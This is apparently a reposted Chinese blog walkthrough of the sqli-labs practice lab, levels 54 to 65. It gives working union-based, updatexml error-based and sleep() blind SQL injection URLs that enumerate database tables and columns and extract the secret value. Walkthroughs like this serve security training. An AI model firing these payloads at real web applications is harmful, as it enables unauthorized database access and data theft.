sqli-labs Less54-Less65

Posted 骑着七彩祥云的少年

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs Less54-Less65相关的知识,希望对你有一定的参考价值。

Less54

从第54关开始,就比较偏向实际挑战方向,这一关对输入次数进行了限制,要求在十次之内,否则刷新数据库随机更新表名列名等信息

首先判断包裹形式,这一关为单引号包裹

http://127.0.0.1/sqli-labs-master/Less-54/?id=1\'--+

 

 

 判断列数http://127.0.0.1/sqli-labs-master/Less-54/?id=1\' order by 3--+

 

 

 查看当前数据库 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1\' union select 1,2,database() --+  当前数据库为challenges

 

 

 查表 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1\' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=\'challenges\'--+

表名为f7fs4xzk70

 

 

 查字段 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1\' union select 1,2,group_concat(column_name)from information_schema.columns where table_name=\'f7fs4xzk70\'--+   

 

 查信息 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1\' union select 1,2,group_concat(concat_ws(0x7e,secret_DPET))from challenges.f7fs4xzk70 --+

取出信息放入下面

 

 我们成功过关

 

 Less-55

这一关有14次机会,包裹形式为?id=1)  其他步骤均与Less54相同

Less-56

这一关包裹形式为?id=1\') 其他步骤均与Less54相同

Less-57

这一关有14次机会,包裹形式为?id=1" 其他步骤均与Less54相同

Less-58

这一关只有五次机会,显然不能使用联合查询,这一关我们使用报错注入

有题目(刚打开的页面显示)可知,我们当前数据库为challenges

查表 http://127.0.0.1/sqli-labs-master/Less-58/?id=1\' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=\'challenges\')),1)--+   表名为v000pri418

 

 查字段  http://127.0.0.1/sqli-labs-master/Less-58/?id=1\' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=\'v000pri418\')),1)--+   

 

 查信息 http://127.0.0.1/sqli-labs-master/Less-58/?id=1\' and updatexml(1,concat(0x7e,(select group_concat(0x7e,secret_T5XO)from challenges.v000pri418)),1)--+

 

 通关成功

 

 Less-59

这一关没有包裹,其他均与第58关相同

Less-60

这一关的包裹形式为?id=1")  其他均与第58关相同,包裹形式不好测出,多试几次即可

Less-61

这一关的包裹形式为?id=1\')  其他均与第58关相同,包裹形式不好测出,多试几次即可

 

Less-62

这一关给了130次机会,由此判断这一关主要使用盲注

判断包裹形式  http://127.0.0.1/sqli-labs-master/Less-62/?id=1\') --+  此次为单引号加括号

 

 由题目可知数据库名字为challenges

测试数据库的长度

http://127.0.0.1/sqli-labs-master/Less-62/?id=1\') if((length(database())=1),1,sleep(5)--+  立刻回显

 

 剩下的可以查看第8-10关的内容,我们也可以使用burpsuit,参考前面的第5关。

Less-63

包裹形式为?id=1\' 在要求与方法上,本关与Less-62相同。

Less-64

包裹形式为?id=1))  在要求与方法上,本关与Less-62相同。

Less-65

包裹形式为?id=1")在要求与方法上,本关与Less-62相同。

 

以上是关于sqli-labs Less54-Less65的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less54-65

SQLI-LABS 靶场通过小记(54~65)

SQLI-LABS 靶场通过小记(54~65)

SQLI-LABS 靶场通过小记(54~65)

Sqli-Labs less54-65

sqli-labs Less62-less65 challenges部分